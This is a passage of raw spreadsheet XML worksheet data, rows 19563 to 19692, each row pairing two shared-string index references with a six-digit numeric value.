        <v>15934</v>
      </c>
      <c r="C19563" s="15">
        <v>608049</v>
      </c>
    </row>
    <row r="19564" spans="1:3">
      <c r="A19564" s="28" t="s">
        <v>26547</v>
      </c>
      <c r="B19564" s="14" t="s">
        <v>16859</v>
      </c>
      <c r="C19564" s="15">
        <v>608050</v>
      </c>
    </row>
    <row r="19565" spans="1:3">
      <c r="A19565" s="28" t="s">
        <v>26548</v>
      </c>
      <c r="B19565" s="14" t="s">
        <v>16860</v>
      </c>
      <c r="C19565" s="15">
        <v>608051</v>
      </c>
    </row>
    <row r="19566" spans="1:3">
      <c r="A19566" s="28" t="s">
        <v>26549</v>
      </c>
      <c r="B19566" s="14" t="s">
        <v>16861</v>
      </c>
      <c r="C19566" s="15">
        <v>608052</v>
      </c>
    </row>
    <row r="19567" spans="1:3">
      <c r="A19567" s="28" t="s">
        <v>25727</v>
      </c>
      <c r="B19567" s="14" t="s">
        <v>15936</v>
      </c>
      <c r="C19567" s="15">
        <v>608054</v>
      </c>
    </row>
    <row r="19568" spans="1:3">
      <c r="A19568" s="28" t="s">
        <v>26550</v>
      </c>
      <c r="B19568" s="14" t="s">
        <v>16862</v>
      </c>
      <c r="C19568" s="15">
        <v>608055</v>
      </c>
    </row>
    <row r="19569" spans="1:3">
      <c r="A19569" s="28" t="s">
        <v>26551</v>
      </c>
      <c r="B19569" s="14" t="s">
        <v>16863</v>
      </c>
      <c r="C19569" s="15">
        <v>608056</v>
      </c>
    </row>
    <row r="19570" spans="1:3">
      <c r="A19570" s="28" t="s">
        <v>26552</v>
      </c>
      <c r="B19570" s="14" t="s">
        <v>16864</v>
      </c>
      <c r="C19570" s="15">
        <v>608057</v>
      </c>
    </row>
    <row r="19571" spans="1:3">
      <c r="A19571" s="28" t="s">
        <v>26553</v>
      </c>
      <c r="B19571" s="14" t="s">
        <v>16865</v>
      </c>
      <c r="C19571" s="15">
        <v>608058</v>
      </c>
    </row>
    <row r="19572" spans="1:3">
      <c r="A19572" s="28" t="s">
        <v>26554</v>
      </c>
      <c r="B19572" s="14" t="s">
        <v>16866</v>
      </c>
      <c r="C19572" s="15">
        <v>608067</v>
      </c>
    </row>
    <row r="19573" spans="1:3">
      <c r="A19573" s="28" t="s">
        <v>166</v>
      </c>
      <c r="B19573" s="14" t="s">
        <v>9326</v>
      </c>
      <c r="C19573" s="15">
        <v>608200</v>
      </c>
    </row>
    <row r="19574" spans="1:3">
      <c r="A19574" s="28" t="s">
        <v>26555</v>
      </c>
      <c r="B19574" s="14" t="s">
        <v>16867</v>
      </c>
      <c r="C19574" s="15">
        <v>608220</v>
      </c>
    </row>
    <row r="19575" spans="1:3">
      <c r="A19575" s="28" t="s">
        <v>25729</v>
      </c>
      <c r="B19575" s="14" t="s">
        <v>8550</v>
      </c>
      <c r="C19575" s="15">
        <v>609000</v>
      </c>
    </row>
    <row r="19576" spans="1:3">
      <c r="A19576" s="28" t="s">
        <v>25730</v>
      </c>
      <c r="B19576" s="14" t="s">
        <v>8550</v>
      </c>
      <c r="C19576" s="15">
        <v>609001</v>
      </c>
    </row>
    <row r="19577" spans="1:3">
      <c r="A19577" s="28" t="s">
        <v>74</v>
      </c>
      <c r="B19577" s="14" t="s">
        <v>8550</v>
      </c>
      <c r="C19577" s="15">
        <v>609002</v>
      </c>
    </row>
    <row r="19578" spans="1:3">
      <c r="A19578" s="28" t="s">
        <v>26556</v>
      </c>
      <c r="B19578" s="14" t="s">
        <v>16868</v>
      </c>
      <c r="C19578" s="15">
        <v>609008</v>
      </c>
    </row>
    <row r="19579" spans="1:3">
      <c r="A19579" s="28" t="s">
        <v>26557</v>
      </c>
      <c r="B19579" s="14" t="s">
        <v>16869</v>
      </c>
      <c r="C19579" s="15">
        <v>609010</v>
      </c>
    </row>
    <row r="19580" spans="1:3">
      <c r="A19580" s="28" t="s">
        <v>7243</v>
      </c>
      <c r="B19580" s="14" t="s">
        <v>15942</v>
      </c>
      <c r="C19580" s="15">
        <v>609011</v>
      </c>
    </row>
    <row r="19581" spans="1:3">
      <c r="A19581" s="28" t="s">
        <v>25732</v>
      </c>
      <c r="B19581" s="14" t="s">
        <v>16869</v>
      </c>
      <c r="C19581" s="15">
        <v>609012</v>
      </c>
    </row>
    <row r="19582" spans="1:3">
      <c r="A19582" s="28" t="s">
        <v>26558</v>
      </c>
      <c r="B19582" s="14" t="s">
        <v>8144</v>
      </c>
      <c r="C19582" s="15">
        <v>609020</v>
      </c>
    </row>
    <row r="19583" spans="1:3">
      <c r="A19583" s="28" t="s">
        <v>25734</v>
      </c>
      <c r="B19583" s="14" t="s">
        <v>10454</v>
      </c>
      <c r="C19583" s="15">
        <v>609021</v>
      </c>
    </row>
    <row r="19584" spans="1:3">
      <c r="A19584" s="28" t="s">
        <v>25735</v>
      </c>
      <c r="B19584" s="14" t="s">
        <v>8550</v>
      </c>
      <c r="C19584" s="15">
        <v>609022</v>
      </c>
    </row>
    <row r="19585" spans="1:3">
      <c r="A19585" s="28" t="s">
        <v>25736</v>
      </c>
      <c r="B19585" s="14" t="s">
        <v>15946</v>
      </c>
      <c r="C19585" s="15">
        <v>609023</v>
      </c>
    </row>
    <row r="19586" spans="1:3">
      <c r="A19586" s="28" t="s">
        <v>25737</v>
      </c>
      <c r="B19586" s="14" t="s">
        <v>15947</v>
      </c>
      <c r="C19586" s="15">
        <v>609024</v>
      </c>
    </row>
    <row r="19587" spans="1:3">
      <c r="A19587" s="28" t="s">
        <v>25739</v>
      </c>
      <c r="B19587" s="14" t="s">
        <v>15949</v>
      </c>
      <c r="C19587" s="15">
        <v>609026</v>
      </c>
    </row>
    <row r="19588" spans="1:3">
      <c r="A19588" s="28" t="s">
        <v>25739</v>
      </c>
      <c r="B19588" s="14" t="s">
        <v>15949</v>
      </c>
      <c r="C19588" s="15">
        <v>609027</v>
      </c>
    </row>
    <row r="19589" spans="1:3">
      <c r="A19589" s="28" t="s">
        <v>7232</v>
      </c>
      <c r="B19589" s="14" t="s">
        <v>10091</v>
      </c>
      <c r="C19589" s="15">
        <v>609031</v>
      </c>
    </row>
    <row r="19590" spans="1:3">
      <c r="A19590" s="28" t="s">
        <v>7232</v>
      </c>
      <c r="B19590" s="14" t="s">
        <v>10091</v>
      </c>
      <c r="C19590" s="15">
        <v>609046</v>
      </c>
    </row>
    <row r="19591" spans="1:3">
      <c r="A19591" s="28" t="s">
        <v>25742</v>
      </c>
      <c r="B19591" s="14" t="s">
        <v>15953</v>
      </c>
      <c r="C19591" s="15">
        <v>609051</v>
      </c>
    </row>
    <row r="19592" spans="1:3">
      <c r="A19592" s="28" t="s">
        <v>26559</v>
      </c>
      <c r="B19592" s="14" t="s">
        <v>16870</v>
      </c>
      <c r="C19592" s="15">
        <v>609060</v>
      </c>
    </row>
    <row r="19593" spans="1:3">
      <c r="A19593" s="28" t="s">
        <v>26560</v>
      </c>
      <c r="B19593" s="14" t="s">
        <v>16871</v>
      </c>
      <c r="C19593" s="15">
        <v>609061</v>
      </c>
    </row>
    <row r="19594" spans="1:3">
      <c r="A19594" s="28" t="s">
        <v>26561</v>
      </c>
      <c r="B19594" s="14" t="s">
        <v>16872</v>
      </c>
      <c r="C19594" s="15">
        <v>609062</v>
      </c>
    </row>
    <row r="19595" spans="1:3">
      <c r="A19595" s="28" t="s">
        <v>25744</v>
      </c>
      <c r="B19595" s="14" t="s">
        <v>16873</v>
      </c>
      <c r="C19595" s="15">
        <v>609071</v>
      </c>
    </row>
    <row r="19596" spans="1:3">
      <c r="A19596" s="28" t="s">
        <v>21664</v>
      </c>
      <c r="B19596" s="14" t="s">
        <v>10785</v>
      </c>
      <c r="C19596" s="15">
        <v>609500</v>
      </c>
    </row>
    <row r="19597" spans="1:3">
      <c r="A19597" s="28" t="s">
        <v>19864</v>
      </c>
      <c r="B19597" s="14" t="s">
        <v>7558</v>
      </c>
      <c r="C19597" s="15">
        <v>615162</v>
      </c>
    </row>
    <row r="19598" spans="1:3">
      <c r="A19598" s="28" t="s">
        <v>26562</v>
      </c>
      <c r="B19598" s="14" t="s">
        <v>16874</v>
      </c>
      <c r="C19598" s="15">
        <v>620000</v>
      </c>
    </row>
    <row r="19599" spans="1:3">
      <c r="A19599" s="28" t="s">
        <v>25757</v>
      </c>
      <c r="B19599" s="14" t="s">
        <v>7754</v>
      </c>
      <c r="C19599" s="15">
        <v>620003</v>
      </c>
    </row>
    <row r="19600" spans="1:3">
      <c r="A19600" s="28" t="s">
        <v>25758</v>
      </c>
      <c r="B19600" s="14" t="s">
        <v>8982</v>
      </c>
      <c r="C19600" s="15">
        <v>620004</v>
      </c>
    </row>
    <row r="19601" spans="1:3">
      <c r="A19601" s="28" t="s">
        <v>19899</v>
      </c>
      <c r="B19601" s="14" t="s">
        <v>8872</v>
      </c>
      <c r="C19601" s="15">
        <v>620007</v>
      </c>
    </row>
    <row r="19602" spans="1:3">
      <c r="A19602" s="28" t="s">
        <v>26563</v>
      </c>
      <c r="B19602" s="14" t="s">
        <v>16875</v>
      </c>
      <c r="C19602" s="15">
        <v>620040</v>
      </c>
    </row>
    <row r="19603" spans="1:3">
      <c r="A19603" s="28" t="s">
        <v>26564</v>
      </c>
      <c r="B19603" s="14" t="s">
        <v>16876</v>
      </c>
      <c r="C19603" s="15">
        <v>620050</v>
      </c>
    </row>
    <row r="19604" spans="1:3">
      <c r="A19604" s="28" t="s">
        <v>22088</v>
      </c>
      <c r="B19604" s="14" t="s">
        <v>11209</v>
      </c>
      <c r="C19604" s="15">
        <v>620101</v>
      </c>
    </row>
    <row r="19605" spans="1:3">
      <c r="A19605" s="28" t="s">
        <v>22088</v>
      </c>
      <c r="B19605" s="14" t="s">
        <v>11209</v>
      </c>
      <c r="C19605" s="15">
        <v>620103</v>
      </c>
    </row>
    <row r="19606" spans="1:3">
      <c r="A19606" s="28" t="s">
        <v>22088</v>
      </c>
      <c r="B19606" s="14" t="s">
        <v>11209</v>
      </c>
      <c r="C19606" s="15">
        <v>620110</v>
      </c>
    </row>
    <row r="19607" spans="1:3">
      <c r="A19607" s="28" t="s">
        <v>22088</v>
      </c>
      <c r="B19607" s="14" t="s">
        <v>11209</v>
      </c>
      <c r="C19607" s="15">
        <v>620111</v>
      </c>
    </row>
    <row r="19608" spans="1:3">
      <c r="A19608" s="28" t="s">
        <v>22088</v>
      </c>
      <c r="B19608" s="14" t="s">
        <v>11209</v>
      </c>
      <c r="C19608" s="15">
        <v>620139</v>
      </c>
    </row>
    <row r="19609" spans="1:3">
      <c r="A19609" s="28" t="s">
        <v>22088</v>
      </c>
      <c r="B19609" s="14" t="s">
        <v>11209</v>
      </c>
      <c r="C19609" s="15">
        <v>620144</v>
      </c>
    </row>
    <row r="19610" spans="1:3">
      <c r="A19610" s="28" t="s">
        <v>22088</v>
      </c>
      <c r="B19610" s="14" t="s">
        <v>11209</v>
      </c>
      <c r="C19610" s="15">
        <v>620146</v>
      </c>
    </row>
    <row r="19611" spans="1:3">
      <c r="A19611" s="28" t="s">
        <v>25763</v>
      </c>
      <c r="B19611" s="14" t="s">
        <v>16877</v>
      </c>
      <c r="C19611" s="15">
        <v>620159</v>
      </c>
    </row>
    <row r="19612" spans="1:3">
      <c r="A19612" s="28" t="s">
        <v>19910</v>
      </c>
      <c r="B19612" s="14" t="s">
        <v>9995</v>
      </c>
      <c r="C19612" s="15">
        <v>620230</v>
      </c>
    </row>
    <row r="19613" spans="1:3">
      <c r="A19613" s="28" t="s">
        <v>20059</v>
      </c>
      <c r="B19613" s="14" t="s">
        <v>9062</v>
      </c>
      <c r="C19613" s="15">
        <v>622108</v>
      </c>
    </row>
    <row r="19614" spans="1:3">
      <c r="A19614" s="28" t="s">
        <v>26565</v>
      </c>
      <c r="B19614" s="14" t="s">
        <v>10197</v>
      </c>
      <c r="C19614" s="15">
        <v>622200</v>
      </c>
    </row>
    <row r="19615" spans="1:3">
      <c r="A19615" s="28" t="s">
        <v>26565</v>
      </c>
      <c r="B19615" s="14" t="s">
        <v>10197</v>
      </c>
      <c r="C19615" s="15">
        <v>622201</v>
      </c>
    </row>
    <row r="19616" spans="1:3">
      <c r="A19616" s="28" t="s">
        <v>26565</v>
      </c>
      <c r="B19616" s="14" t="s">
        <v>10197</v>
      </c>
      <c r="C19616" s="15">
        <v>622202</v>
      </c>
    </row>
    <row r="19617" spans="1:3">
      <c r="A19617" s="28" t="s">
        <v>26565</v>
      </c>
      <c r="B19617" s="14" t="s">
        <v>10197</v>
      </c>
      <c r="C19617" s="15">
        <v>622210</v>
      </c>
    </row>
    <row r="19618" spans="1:3">
      <c r="A19618" s="28" t="s">
        <v>26565</v>
      </c>
      <c r="B19618" s="14" t="s">
        <v>10197</v>
      </c>
      <c r="C19618" s="15">
        <v>622211</v>
      </c>
    </row>
    <row r="19619" spans="1:3">
      <c r="A19619" s="28" t="s">
        <v>26565</v>
      </c>
      <c r="B19619" s="14" t="s">
        <v>10197</v>
      </c>
      <c r="C19619" s="15">
        <v>622212</v>
      </c>
    </row>
    <row r="19620" spans="1:3">
      <c r="A19620" s="28" t="s">
        <v>26565</v>
      </c>
      <c r="B19620" s="14" t="s">
        <v>10197</v>
      </c>
      <c r="C19620" s="15">
        <v>622213</v>
      </c>
    </row>
    <row r="19621" spans="1:3">
      <c r="A19621" s="28" t="s">
        <v>25768</v>
      </c>
      <c r="B19621" s="14" t="s">
        <v>15976</v>
      </c>
      <c r="C19621" s="15">
        <v>622300</v>
      </c>
    </row>
    <row r="19622" spans="1:3">
      <c r="A19622" s="28" t="s">
        <v>25768</v>
      </c>
      <c r="B19622" s="14" t="s">
        <v>15976</v>
      </c>
      <c r="C19622" s="15">
        <v>622301</v>
      </c>
    </row>
    <row r="19623" spans="1:3">
      <c r="A19623" s="28" t="s">
        <v>25768</v>
      </c>
      <c r="B19623" s="14" t="s">
        <v>15976</v>
      </c>
      <c r="C19623" s="15">
        <v>622302</v>
      </c>
    </row>
    <row r="19624" spans="1:3">
      <c r="A19624" s="28" t="s">
        <v>26566</v>
      </c>
      <c r="B19624" s="14" t="s">
        <v>16878</v>
      </c>
      <c r="C19624" s="15">
        <v>622314</v>
      </c>
    </row>
    <row r="19625" spans="1:3">
      <c r="A19625" s="28" t="s">
        <v>20706</v>
      </c>
      <c r="B19625" s="14" t="s">
        <v>9782</v>
      </c>
      <c r="C19625" s="15">
        <v>622341</v>
      </c>
    </row>
    <row r="19626" spans="1:3">
      <c r="A19626" s="28" t="s">
        <v>20706</v>
      </c>
      <c r="B19626" s="14" t="s">
        <v>9782</v>
      </c>
      <c r="C19626" s="15">
        <v>622343</v>
      </c>
    </row>
    <row r="19627" spans="1:3">
      <c r="A19627" s="28" t="s">
        <v>26567</v>
      </c>
      <c r="B19627" s="14" t="s">
        <v>16879</v>
      </c>
      <c r="C19627" s="15">
        <v>622350</v>
      </c>
    </row>
    <row r="19628" spans="1:3">
      <c r="A19628" s="28" t="s">
        <v>26568</v>
      </c>
      <c r="B19628" s="14" t="s">
        <v>16880</v>
      </c>
      <c r="C19628" s="15">
        <v>622602</v>
      </c>
    </row>
    <row r="19629" spans="1:3">
      <c r="A19629" s="28" t="s">
        <v>26569</v>
      </c>
      <c r="B19629" s="14" t="s">
        <v>16881</v>
      </c>
      <c r="C19629" s="15">
        <v>622620</v>
      </c>
    </row>
    <row r="19630" spans="1:3">
      <c r="A19630" s="28" t="s">
        <v>26570</v>
      </c>
      <c r="B19630" s="14" t="s">
        <v>16882</v>
      </c>
      <c r="C19630" s="15">
        <v>622621</v>
      </c>
    </row>
    <row r="19631" spans="1:3">
      <c r="A19631" s="28" t="s">
        <v>26571</v>
      </c>
      <c r="B19631" s="14" t="s">
        <v>16883</v>
      </c>
      <c r="C19631" s="15">
        <v>622622</v>
      </c>
    </row>
    <row r="19632" spans="1:3">
      <c r="A19632" s="28" t="s">
        <v>19913</v>
      </c>
      <c r="B19632" s="14" t="s">
        <v>8566</v>
      </c>
      <c r="C19632" s="15">
        <v>622640</v>
      </c>
    </row>
    <row r="19633" spans="1:3">
      <c r="A19633" s="28" t="s">
        <v>19913</v>
      </c>
      <c r="B19633" s="14" t="s">
        <v>8566</v>
      </c>
      <c r="C19633" s="15">
        <v>622641</v>
      </c>
    </row>
    <row r="19634" spans="1:3">
      <c r="A19634" s="28" t="s">
        <v>26572</v>
      </c>
      <c r="B19634" s="14" t="s">
        <v>16884</v>
      </c>
      <c r="C19634" s="15">
        <v>622663</v>
      </c>
    </row>
    <row r="19635" spans="1:3">
      <c r="A19635" s="28" t="s">
        <v>25774</v>
      </c>
      <c r="B19635" s="14" t="s">
        <v>16885</v>
      </c>
      <c r="C19635" s="15">
        <v>626000</v>
      </c>
    </row>
    <row r="19636" spans="1:3">
      <c r="A19636" s="28" t="s">
        <v>26573</v>
      </c>
      <c r="B19636" s="14" t="s">
        <v>11208</v>
      </c>
      <c r="C19636" s="15">
        <v>626001</v>
      </c>
    </row>
    <row r="19637" spans="1:3">
      <c r="A19637" s="28" t="s">
        <v>26574</v>
      </c>
      <c r="B19637" s="14" t="s">
        <v>16886</v>
      </c>
      <c r="C19637" s="15">
        <v>626002</v>
      </c>
    </row>
    <row r="19638" spans="1:3">
      <c r="A19638" s="28" t="s">
        <v>26575</v>
      </c>
      <c r="B19638" s="14" t="s">
        <v>16887</v>
      </c>
      <c r="C19638" s="15">
        <v>626004</v>
      </c>
    </row>
    <row r="19639" spans="1:3">
      <c r="A19639" s="28" t="s">
        <v>26576</v>
      </c>
      <c r="B19639" s="14" t="s">
        <v>16888</v>
      </c>
      <c r="C19639" s="15">
        <v>626020</v>
      </c>
    </row>
    <row r="19640" spans="1:3">
      <c r="A19640" s="28" t="s">
        <v>25776</v>
      </c>
      <c r="B19640" s="14" t="s">
        <v>16889</v>
      </c>
      <c r="C19640" s="15">
        <v>626021</v>
      </c>
    </row>
    <row r="19641" spans="1:3">
      <c r="A19641" s="28" t="s">
        <v>772</v>
      </c>
      <c r="B19641" s="14" t="s">
        <v>10408</v>
      </c>
      <c r="C19641" s="15">
        <v>626029</v>
      </c>
    </row>
    <row r="19642" spans="1:3">
      <c r="A19642" s="28" t="s">
        <v>19807</v>
      </c>
      <c r="B19642" s="14" t="s">
        <v>12092</v>
      </c>
      <c r="C19642" s="15">
        <v>626041</v>
      </c>
    </row>
    <row r="19643" spans="1:3">
      <c r="A19643" s="28" t="s">
        <v>25777</v>
      </c>
      <c r="B19643" s="14" t="s">
        <v>15984</v>
      </c>
      <c r="C19643" s="15">
        <v>626042</v>
      </c>
    </row>
    <row r="19644" spans="1:3">
      <c r="A19644" s="28" t="s">
        <v>4418</v>
      </c>
      <c r="B19644" s="14" t="s">
        <v>16890</v>
      </c>
      <c r="C19644" s="15">
        <v>626043</v>
      </c>
    </row>
    <row r="19645" spans="1:3">
      <c r="A19645" s="28" t="s">
        <v>21032</v>
      </c>
      <c r="B19645" s="14" t="s">
        <v>10133</v>
      </c>
      <c r="C19645" s="15">
        <v>626044</v>
      </c>
    </row>
    <row r="19646" spans="1:3">
      <c r="A19646" s="28" t="s">
        <v>25778</v>
      </c>
      <c r="B19646" s="14" t="s">
        <v>16891</v>
      </c>
      <c r="C19646" s="15">
        <v>626045</v>
      </c>
    </row>
    <row r="19647" spans="1:3">
      <c r="A19647" s="28" t="s">
        <v>25779</v>
      </c>
      <c r="B19647" s="14" t="s">
        <v>16892</v>
      </c>
      <c r="C19647" s="15">
        <v>626049</v>
      </c>
    </row>
    <row r="19648" spans="1:3">
      <c r="A19648" s="28" t="s">
        <v>26577</v>
      </c>
      <c r="B19648" s="14" t="s">
        <v>16893</v>
      </c>
      <c r="C19648" s="15">
        <v>626050</v>
      </c>
    </row>
    <row r="19649" spans="1:3">
      <c r="A19649" s="28" t="s">
        <v>25780</v>
      </c>
      <c r="B19649" s="14" t="s">
        <v>15987</v>
      </c>
      <c r="C19649" s="15">
        <v>626100</v>
      </c>
    </row>
    <row r="19650" spans="1:3">
      <c r="A19650" s="28" t="s">
        <v>20655</v>
      </c>
      <c r="B19650" s="14" t="s">
        <v>16894</v>
      </c>
      <c r="C19650" s="15">
        <v>630001</v>
      </c>
    </row>
    <row r="19651" spans="1:3">
      <c r="A19651" s="28" t="s">
        <v>20655</v>
      </c>
      <c r="B19651" s="14" t="s">
        <v>16894</v>
      </c>
      <c r="C19651" s="15">
        <v>630002</v>
      </c>
    </row>
    <row r="19652" spans="1:3">
      <c r="A19652" s="28" t="s">
        <v>25783</v>
      </c>
      <c r="B19652" s="14" t="s">
        <v>15989</v>
      </c>
      <c r="C19652" s="15">
        <v>630071</v>
      </c>
    </row>
    <row r="19653" spans="1:3" ht="25.5">
      <c r="A19653" s="28" t="s">
        <v>26578</v>
      </c>
      <c r="B19653" s="14" t="s">
        <v>16895</v>
      </c>
      <c r="C19653" s="15">
        <v>639997</v>
      </c>
    </row>
    <row r="19654" spans="1:3">
      <c r="A19654" s="28" t="s">
        <v>19820</v>
      </c>
      <c r="B19654" s="14" t="s">
        <v>8785</v>
      </c>
      <c r="C19654" s="15">
        <v>641003</v>
      </c>
    </row>
    <row r="19655" spans="1:3">
      <c r="A19655" s="28" t="s">
        <v>25804</v>
      </c>
      <c r="B19655" s="14" t="s">
        <v>16011</v>
      </c>
      <c r="C19655" s="15">
        <v>641070</v>
      </c>
    </row>
    <row r="19656" spans="1:3">
      <c r="A19656" s="28" t="s">
        <v>602</v>
      </c>
      <c r="B19656" s="14" t="s">
        <v>9639</v>
      </c>
      <c r="C19656" s="15">
        <v>645040</v>
      </c>
    </row>
    <row r="19657" spans="1:3">
      <c r="A19657" s="28" t="s">
        <v>26579</v>
      </c>
      <c r="B19657" s="14" t="s">
        <v>16896</v>
      </c>
      <c r="C19657" s="15">
        <v>649140</v>
      </c>
    </row>
    <row r="19658" spans="1:3">
      <c r="A19658" s="28" t="s">
        <v>26580</v>
      </c>
      <c r="B19658" s="14" t="s">
        <v>16897</v>
      </c>
      <c r="C19658" s="15">
        <v>649141</v>
      </c>
    </row>
    <row r="19659" spans="1:3">
      <c r="A19659" s="28" t="s">
        <v>26581</v>
      </c>
      <c r="B19659" s="14" t="s">
        <v>16898</v>
      </c>
      <c r="C19659" s="15">
        <v>650008</v>
      </c>
    </row>
    <row r="19660" spans="1:3">
      <c r="A19660" s="28" t="s">
        <v>216</v>
      </c>
      <c r="B19660" s="14" t="s">
        <v>10790</v>
      </c>
      <c r="C19660" s="15">
        <v>650020</v>
      </c>
    </row>
    <row r="19661" spans="1:3">
      <c r="A19661" s="28" t="s">
        <v>21095</v>
      </c>
      <c r="B19661" s="14" t="s">
        <v>10197</v>
      </c>
      <c r="C19661" s="15">
        <v>650041</v>
      </c>
    </row>
    <row r="19662" spans="1:3">
      <c r="A19662" s="28" t="s">
        <v>107</v>
      </c>
      <c r="B19662" s="14" t="s">
        <v>9072</v>
      </c>
      <c r="C19662" s="15">
        <v>650371</v>
      </c>
    </row>
    <row r="19663" spans="1:3">
      <c r="A19663" s="28" t="s">
        <v>21675</v>
      </c>
      <c r="B19663" s="14" t="s">
        <v>8912</v>
      </c>
      <c r="C19663" s="15">
        <v>650500</v>
      </c>
    </row>
    <row r="19664" spans="1:3">
      <c r="A19664" s="28" t="s">
        <v>26582</v>
      </c>
      <c r="B19664" s="14" t="s">
        <v>16899</v>
      </c>
      <c r="C19664" s="15">
        <v>650501</v>
      </c>
    </row>
    <row r="19665" spans="1:3">
      <c r="A19665" s="28" t="s">
        <v>26583</v>
      </c>
      <c r="B19665" s="14" t="s">
        <v>16900</v>
      </c>
      <c r="C19665" s="15">
        <v>650502</v>
      </c>
    </row>
    <row r="19666" spans="1:3">
      <c r="A19666" s="28" t="s">
        <v>26584</v>
      </c>
      <c r="B19666" s="14" t="s">
        <v>16082</v>
      </c>
      <c r="C19666" s="15">
        <v>650503</v>
      </c>
    </row>
    <row r="19667" spans="1:3">
      <c r="A19667" s="28" t="s">
        <v>25892</v>
      </c>
      <c r="B19667" s="14" t="s">
        <v>16083</v>
      </c>
      <c r="C19667" s="15">
        <v>650504</v>
      </c>
    </row>
    <row r="19668" spans="1:3">
      <c r="A19668" s="28" t="s">
        <v>26585</v>
      </c>
      <c r="B19668" s="14" t="s">
        <v>16901</v>
      </c>
      <c r="C19668" s="15">
        <v>650505</v>
      </c>
    </row>
    <row r="19669" spans="1:3">
      <c r="A19669" s="28" t="s">
        <v>26586</v>
      </c>
      <c r="B19669" s="14" t="s">
        <v>16902</v>
      </c>
      <c r="C19669" s="15">
        <v>650506</v>
      </c>
    </row>
    <row r="19670" spans="1:3">
      <c r="A19670" s="28" t="s">
        <v>25894</v>
      </c>
      <c r="B19670" s="14" t="s">
        <v>16903</v>
      </c>
      <c r="C19670" s="15">
        <v>650507</v>
      </c>
    </row>
    <row r="19671" spans="1:3">
      <c r="A19671" s="28" t="s">
        <v>26587</v>
      </c>
      <c r="B19671" s="14" t="s">
        <v>16086</v>
      </c>
      <c r="C19671" s="15">
        <v>650508</v>
      </c>
    </row>
    <row r="19672" spans="1:3">
      <c r="A19672" s="28" t="s">
        <v>22311</v>
      </c>
      <c r="B19672" s="14" t="s">
        <v>11434</v>
      </c>
      <c r="C19672" s="15">
        <v>650511</v>
      </c>
    </row>
    <row r="19673" spans="1:3">
      <c r="A19673" s="28" t="s">
        <v>23893</v>
      </c>
      <c r="B19673" s="14" t="s">
        <v>13269</v>
      </c>
      <c r="C19673" s="15">
        <v>650514</v>
      </c>
    </row>
    <row r="19674" spans="1:3">
      <c r="A19674" s="28" t="s">
        <v>26588</v>
      </c>
      <c r="B19674" s="14" t="s">
        <v>16904</v>
      </c>
      <c r="C19674" s="15">
        <v>650515</v>
      </c>
    </row>
    <row r="19675" spans="1:3">
      <c r="A19675" s="28" t="s">
        <v>26589</v>
      </c>
      <c r="B19675" s="14" t="s">
        <v>15116</v>
      </c>
      <c r="C19675" s="15">
        <v>650516</v>
      </c>
    </row>
    <row r="19676" spans="1:3">
      <c r="A19676" s="28" t="s">
        <v>26590</v>
      </c>
      <c r="B19676" s="14" t="s">
        <v>16089</v>
      </c>
      <c r="C19676" s="15">
        <v>650518</v>
      </c>
    </row>
    <row r="19677" spans="1:3">
      <c r="A19677" s="28" t="s">
        <v>25899</v>
      </c>
      <c r="B19677" s="14" t="s">
        <v>16091</v>
      </c>
      <c r="C19677" s="15">
        <v>650520</v>
      </c>
    </row>
    <row r="19678" spans="1:3">
      <c r="A19678" s="28" t="s">
        <v>25903</v>
      </c>
      <c r="B19678" s="14" t="s">
        <v>16094</v>
      </c>
      <c r="C19678" s="15">
        <v>650525</v>
      </c>
    </row>
    <row r="19679" spans="1:3">
      <c r="A19679" s="28" t="s">
        <v>26591</v>
      </c>
      <c r="B19679" s="14" t="s">
        <v>16905</v>
      </c>
      <c r="C19679" s="15">
        <v>650528</v>
      </c>
    </row>
    <row r="19680" spans="1:3">
      <c r="A19680" s="28" t="s">
        <v>421</v>
      </c>
      <c r="B19680" s="14" t="s">
        <v>8453</v>
      </c>
      <c r="C19680" s="15">
        <v>650807</v>
      </c>
    </row>
    <row r="19681" spans="1:3">
      <c r="A19681" s="28" t="s">
        <v>26592</v>
      </c>
      <c r="B19681" s="14" t="s">
        <v>16906</v>
      </c>
      <c r="C19681" s="15">
        <v>650871</v>
      </c>
    </row>
    <row r="19682" spans="1:3">
      <c r="A19682" s="28" t="s">
        <v>20975</v>
      </c>
      <c r="B19682" s="14" t="s">
        <v>10075</v>
      </c>
      <c r="C19682" s="15">
        <v>652002</v>
      </c>
    </row>
    <row r="19683" spans="1:3">
      <c r="A19683" s="28" t="s">
        <v>26593</v>
      </c>
      <c r="B19683" s="14" t="s">
        <v>16907</v>
      </c>
      <c r="C19683" s="15">
        <v>652021</v>
      </c>
    </row>
    <row r="19684" spans="1:3">
      <c r="A19684" s="28" t="s">
        <v>469</v>
      </c>
      <c r="B19684" s="14" t="s">
        <v>7471</v>
      </c>
      <c r="C19684" s="15">
        <v>652092</v>
      </c>
    </row>
    <row r="19685" spans="1:3">
      <c r="A19685" s="28" t="s">
        <v>25913</v>
      </c>
      <c r="B19685" s="14" t="s">
        <v>16103</v>
      </c>
      <c r="C19685" s="15">
        <v>653550</v>
      </c>
    </row>
    <row r="19686" spans="1:3">
      <c r="A19686" s="28" t="s">
        <v>23663</v>
      </c>
      <c r="B19686" s="14" t="s">
        <v>12384</v>
      </c>
      <c r="C19686" s="15">
        <v>654110</v>
      </c>
    </row>
    <row r="19687" spans="1:3">
      <c r="A19687" s="28" t="s">
        <v>21562</v>
      </c>
      <c r="B19687" s="14" t="s">
        <v>12384</v>
      </c>
      <c r="C19687" s="15">
        <v>654111</v>
      </c>
    </row>
    <row r="19688" spans="1:3">
      <c r="A19688" s="28" t="s">
        <v>25916</v>
      </c>
      <c r="B19688" s="14" t="s">
        <v>16908</v>
      </c>
      <c r="C19688" s="15">
        <v>654115</v>
      </c>
    </row>
    <row r="19689" spans="1:3">
      <c r="A19689" s="28" t="s">
        <v>25917</v>
      </c>
      <c r="B19689" s="14" t="s">
        <v>16106</v>
      </c>
      <c r="C19689" s="15">
        <v>655000</v>
      </c>
    </row>
    <row r="19690" spans="1:3">
      <c r="A19690" s="28" t="s">
        <v>25918</v>
      </c>
      <c r="B19690" s="14" t="s">
        <v>16446</v>
      </c>
      <c r="C19690" s="15">
        <v>655001</v>
      </c>
    </row>
    <row r="19691" spans="1:3">
      <c r="A19691" s="28" t="s">
        <v>580</v>
      </c>
      <c r="B19691" s="14" t="s">
        <v>11446</v>
      </c>
      <c r="C19691" s="15">
        <v>655009</v>
      </c>
    </row>
    <row r="19692" spans="1:3">
      <c r="A19692" s="28" t="s">
        <v>694</v>
      </c>
      <c r="B19692" s="14" t="s">
        <v>8751</v>
      </c>
      <c r="C19692" s="15">
        <v>655040</v>
